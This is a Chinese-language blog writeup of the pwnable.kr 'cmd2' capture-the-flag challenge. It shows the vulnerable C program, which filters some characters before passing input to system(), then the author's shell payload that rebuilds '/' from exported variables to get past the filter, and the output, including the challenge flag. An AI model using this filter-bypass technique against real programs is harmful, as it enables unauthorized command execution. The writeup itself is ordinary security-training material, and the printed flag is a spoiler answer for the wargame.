标签:
试了一晚上终于试出来了。。。。真心曲折,考察linux脚本。
里面需要注意的点如下:
1. Linux里面的sh bash是不一样的,在不同系统上的存在也有不同。sh是为Unix所设计,讲究精简,里面比dash少一些功能,导致调试脚本时很多错了不知道怎么改,一步一步试出来的;
2. 重点在于构造“/”这个东西
3. 到此Toodler‘s Bottle已经刷完了,我的教程也写到了Lesson 3,接下来的题目writeup很少,我自己做也比较困难,可能转Protostar训练了吧? 前面进展缓慢,后面加速了~
cmd2@ubuntu:~$ ls
cmd2 cmd2.c flag
cmd2@ubuntu:~$ cat cmd2.c
#include <stdio.h>
#include <string.h>
int filter(char* cmd){
int r=0;
r += strstr(cmd, "/")!=0;
r += strstr(cmd, "`")!=0;
r += strstr(cmd, "flag")!=0;
return r;
}
extern char** environ;
void delete_env(){
char** p;
for(p=environ; *p; p++) memset(*p, 0, strlen(*p));
}
int main(int argc, char* argv[], char** envp){
delete_env();
putenv("PATH=/no_command_execution_until_you_become_a_hacker");
if(filter(argv[1])) return 0;
printf("%s\n", argv[1]);
system( argv[1] );
return 0;
}
<"bin"${STR2}"find";STR4=${STR2}"usr"${STR2}"bin"${STR2}"xargs "${STR2}"bin"${STR2}"grep a";$STR3|$STR4‘
STR=$(export);STR1=${STR#*home};STR2=${STR1%cmd2*};STR3=${STR2}"usr"${STR2}"bin"${STR2}"find";STR4=${STR2}"usr"${STR2}"bin"${STR2}"xargs "${STR2}"bin"${STR2}"grep a";$STR3|$STR4
/usr/bin/find: `./.bash_history‘: Permission denied
/bin/grep: ./.bash_history: Permission denied
./flag:FuN_w1th_5h3ll_v4riabl3s_haha
./cmd2.c:int filter(char* cmd){
./cmd2.c: r += strstr(cmd, "flag")!=0;
./cmd2.c:extern char** environ;
./cmd2.c: char** p;
./cmd2.c:int main(int argc, char* argv[], char** envp){
./cmd2.c: putenv("PATH=/no_command_execution_until_you_become_a_hacker");
./cmd2.c: if(filter(argv[1])) return 0;
./cmd2.c: printf("%s\n", argv[1]);
./cmd2.c: system( argv[1] );
Binary file ./cmd2 matches
【LINUX】pwnable.kr cmd2 writeup
标签:
原文地址:http://www.cnblogs.com/windcarp/p/4657974.html